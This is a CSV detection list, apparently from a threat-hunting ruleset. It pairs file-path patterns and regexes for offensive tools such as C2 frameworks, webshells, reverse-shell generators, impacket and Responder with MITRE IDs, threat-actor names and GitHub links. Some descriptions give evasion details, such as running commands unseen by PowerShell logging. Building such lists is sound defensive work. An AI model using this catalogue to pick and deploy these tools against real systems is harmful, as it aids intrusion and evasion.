--*",".{0,1000}\\ft\.exe\""\s\-\-.{0,1000}","offensive_tool_keyword","File-Tunnel","Tunnel TCP connections through a file","T1071 - T1105 - T1090","TA0005 - TA0008 - 
TA0011","N/A","N/A","Lateral Movement","https://github.com/fiddyschmitt/File-Tunnel","1","0","N/A","N/A","10","10","925","82","2025-04-19T15:06:09Z","2023-02-05T12:57:45Z","15506" "*\ft.exe"" /install*",".{0,1000}\\ft\.exe\""\s\/install.{0,1000}","offensive_tool_keyword","File-Tunnel","Tunnel TCP connections through a file","T1071 - T1105 - T1090","TA0005 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/fiddyschmitt/File-Tunnel","1","0","N/A","N/A","10","10","925","82","2025-04-19T15:06:09Z","2023-02-05T12:57:45Z","15507" "*\ft.exe"" /load*",".{0,1000}\\ft\.exe\""\s\/load.{0,1000}","offensive_tool_keyword","File-Tunnel","Tunnel TCP connections through a file","T1071 - T1105 - T1090","TA0005 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/fiddyschmitt/File-Tunnel","1","0","N/A","N/A","10","10","925","82","2025-04-19T15:06:09Z","2023-02-05T12:57:45Z","15508" "*\ft.exe"" -install*",".{0,1000}\\ft\.exe\""\s\-install.{0,1000}","offensive_tool_keyword","File-Tunnel","Tunnel TCP connections through a file","T1071 - T1105 - T1090","TA0005 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/fiddyschmitt/File-Tunnel","1","0","N/A","N/A","10","10","925","82","2025-04-19T15:06:09Z","2023-02-05T12:57:45Z","15509" "*\FtpC2.sln*",".{0,1000}\\FtpC2\.sln.{0,1000}","offensive_tool_keyword","SharpFtpC2","A Streamlined FTP-Driven Command and Control Conduit for Interconnecting Remote Systems","T1071.002 - T1105 - T1090.001","TA0011","N/A","N/A","C2","https://github.com/PhrozenIO/SharpFtpC2","1","0","N/A","N/A","10","10","88","15","2023-11-09T10:37:20Z","2023-06-09T12:41:28Z","15510" "*\FtpC2\*",".{0,1000}\\FtpC2\\.{0,1000}","offensive_tool_keyword","SharpFtpC2","A Streamlined FTP-Driven Command and Control Conduit for Interconnecting Remote Systems.","T1572 - T1041 - T1105","TA0011 - TA0002 - 
TA0040","N/A","N/A","C2","https://github.com/DarkCoderSc/SharpFtpC2","1","0","N/A","N/A","10","10","88","15","2023-11-09T10:37:20Z","2023-06-09T12:41:28Z","15511" "*\FtpC2\FtpC2\*",".{0,1000}\\FtpC2\\FtpC2\\.{0,1000}","offensive_tool_keyword","SharpFtpC2","A Streamlined FTP-Driven Command and Control Conduit for Interconnecting Remote Systems","T1071.002 - T1105 - T1090.001","TA0011","N/A","N/A","C2","https://github.com/PhrozenIO/SharpFtpC2","1","0","N/A","N/A","10","10","88","15","2023-11-09T10:37:20Z","2023-06-09T12:41:28Z","15512" "*\FTP-Clear-Text-Password-*.txt*",".{0,1000}\\FTP\-Clear\-Text\-Password\-.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011 - T1040","TA0011 - TA0006 - TA0007","N/A","Lazarus Group - APT28 - FANCY BEAR - EMBER BEAR","Sniffing & Spoofing","https://github.com/lgandx/Responder-Windows/","1","0","N/A","N/A","N/A","6","523","137","2024-07-30T11:10:05Z","2015-02-07T22:59:04Z","15513" "*\fuck.php*",".{0,1000}\\fuck\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","15514" "*\FudgeC2*",".{0,1000}\\FudgeC2.{0,1000}","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","0","N/A","N/A","10","10","253","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z","15515" "*\fullc2_setup_token.txt*",".{0,1000}\\fullc2_setup_token\.txt.{0,1000}","offensive_tool_keyword","hak5 cloudc2","Cloud C2 makes it easy for pentesters and security teams to deploy and manage Hak5 gear from the cloud","T1021 - 
T1102 - T1213","TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://shop.hak5.org/products/c2?","1","0","N/A","N/A","10","9","N/A","N/A","N/A","N/A","15516" "*\FullPowers.dll*",".{0,1000}\\FullPowers\.dll.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","15517" "*\FWUprank.ps1",".{0,1000}\\FWUprank\.ps1","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","15518" "*\g00nv13.php*",".{0,1000}\\g00nv13\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","15519" 
"*\gandcrab.txt*",".{0,1000}\\gandcrab\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","15526" "*\GatewayConsoleExe_d64.exe*",".{0,1000}\\GatewayConsoleExe_d64\.exe.{0,1000}","offensive_tool_keyword","C3","Framework designed for red teams to create and manage custom C2 (Command and Control) channels. Unlike traditional C2 frameworks that rely on typical communication methods like HTTP/S DNS or TCP - C3 allows for the creation of non-traditional and esoteric C2 channels using platforms like Slack Dropbox GitHub OneDrive and more.","T1071 - T1102 - T1090 - T1573 - T1048","TA0011 - TA0002 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/WithSecureLabs/C3","1","0","N/A","N/A","9","10","1602","276","2023-03-04T20:32:13Z","2019-08-30T11:21:04Z","15527" "*\Gay Porn Mailer.exe*",".{0,1000}\\Gay\sPorn\sMailer\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","15528" "*\geacon\tools\BeaconTool\*",".{0,1000}\\geacon\\tools\\BeaconTool\\.{0,1000}","offensive_tool_keyword","cobaltstrike","CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 
- T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/darkr4y/geacon","1","0","N/A","N/A","10","10","1189","206","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z","15529" "*\gecko-new.php*",".{0,1000}\\gecko\-new\.php.{0,1000}","offensive_tool_keyword","Gecko","Gecko Backdoor is a web php backdoor","T1100 - T1059 - T1105 - T1203","TA0011 - TA0003","N/A","N/A","C2","https://github.com/MadExploits/Gecko","1","0","N/A","N/A","10","10","118","56","2025-02-08T17:50:28Z","2022-07-15T05:51:04Z","15530" "*\gecko-old.php*",".{0,1000}\\gecko\-old\.php.{0,1000}","offensive_tool_keyword","Gecko","Gecko Backdoor is a web php backdoor","T1100 - T1059 - T1105 - T1203","TA0011 - TA0003","N/A","N/A","C2","https://github.com/MadExploits/Gecko","1","0","N/A","N/A","10","10","118","56","2025-02-08T17:50:28Z","2022-07-15T05:51:04Z","15531" "*\generate_bind_fuegoshell.ps1*",".{0,1000}\\generate_bind_fuegoshell\.ps1.{0,1000}","offensive_tool_keyword","fuegoshell","Fuegoshell is a 
powershell oneliner generator for Windows remote shell re-using TCP 445","T1059.001 - T1203","TA0002 - TA0011 - TA0008","N/A","N/A","Lateral Movement","https://github.com/v1k1ngfr/fuegoshell","1","0","N/A","N/A","10","1","44","7","2024-04-27T09:03:28Z","2024-04-27T08:06:03Z","15533" "*\generate_reverse_fuegoshell.ps1*",".{0,1000}\\generate_reverse_fuegoshell\.ps1.{0,1000}","offensive_tool_keyword","fuegoshell","Fuegoshell is a powershell oneliner generator for Windows remote shell re-using TCP 445","T1059.001 - T1203","TA0002 - TA0011 - TA0008","N/A","N/A","Lateral Movement","https://github.com/v1k1ngfr/fuegoshell","1","0","N/A","N/A","10","1","44","7","2024-04-27T09:03:28Z","2024-04-27T08:06:03Z","15534" "*\get_netconnections.py*",".{0,1000}\\get_netconnections\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","15535" "*\GetADComputers.py*",".{0,1000}\\GetADComputers\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","15536" "*\GetADGroupCommand.cs",".{0,1000}\\GetADGroupCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","15537" "*\GetADGroupMemberCommand.cs",".{0,1000}\\GetADGroupMemberCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. 
An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","15538" "*\GetAdmin.log*",".{0,1000}\\GetAdmin\.log.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","15539" "*\GetAdmin.ps1*",".{0,1000}\\GetAdmin\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","15540" "*\GetADObjectCommand.cs",".{0,1000}\\GetADObjectCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands 
while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","15541" "*\GetADTrustCommand.cs",".{0,1000}\\GetADTrustCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","15542" "*\GetADUserCommand.cs",".{0,1000}\\GetADUserCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. 
An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","15543" "*\GetADUsers.py*",".{0,1000}\\GetADUsers\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","15544" "*\getallkeysregistry.py*",".{0,1000}\\getallkeysregistry\.py.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","15545" 
"*\getallkeysregistry.txt*",".{0,1000}\\getallkeysregistry\.txt.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","15546" "*\Getallregkeys.txt*",".{0,1000}\\Getallregkeys\.txt.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","15547" "*\Getallregvalues.txt*",".{0,1000}\\Getallregvalues\.txt.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","15548" "*\getallvaluesregistry.py*",".{0,1000}\\getallvaluesregistry\.py.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - 
TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","15549" "*\getallvaluesregistry.txt*",".{0,1000}\\getallvaluesregistry\.txt.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","15550" "*\getArch.py*",".{0,1000}\\getArch\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","15551" "*\get-attack.ps1*",".{0,1000}\\get\-attack\.ps1.{0,1000}","offensive_tool_keyword","PSAttack","PSAttack contains over 100 commands for Privilege Escalation - Recon and Data Exfiltration","T1059 - T1212 - T1012 - T1087 - T1005 - T1041 - T1020","TA0002 - TA0004 - TA0005 - TA0007 - TA0010 - 
TA0008","N/A","N/A","Exploitation tool","https://github.com/GDSSecurity/PSAttack","1","0","N/A","N/A","10","1","45","15","2017-04-04T20:37:33Z","2016-02-22T23:45:22Z","15552" "*\GetBrowsers.ps1*",".{0,1000}\\GetBrowsers\.ps1.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","0","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","15554" "*\GetChildItemCommand.cs",".{0,1000}\\GetChildItemCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","15555" "*\GetClipboardCommand.cs",".{0,1000}\\GetClipboardCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. 
An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","15556" "*\GetCommandCommand.cs",".{0,1000}\\GetCommandCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","15557" "*\GetComputerInfoCommand.cs",".{0,1000}\\GetComputerInfoCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. 
An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","15558" "*\GetContentCommand.cs",".{0,1000}\\GetContentCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","15559" "*\Get-Credential.sql*",".{0,1000}\\Get\-Credential\.sql.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. 
PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","0","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","15560" "*\get-desc-users.py*",".{0,1000}\\get\-desc\-users\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","15561" "*\GetDnsClientCacheCommand.cs",".{0,1000}\\GetDnsClientCacheCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. 
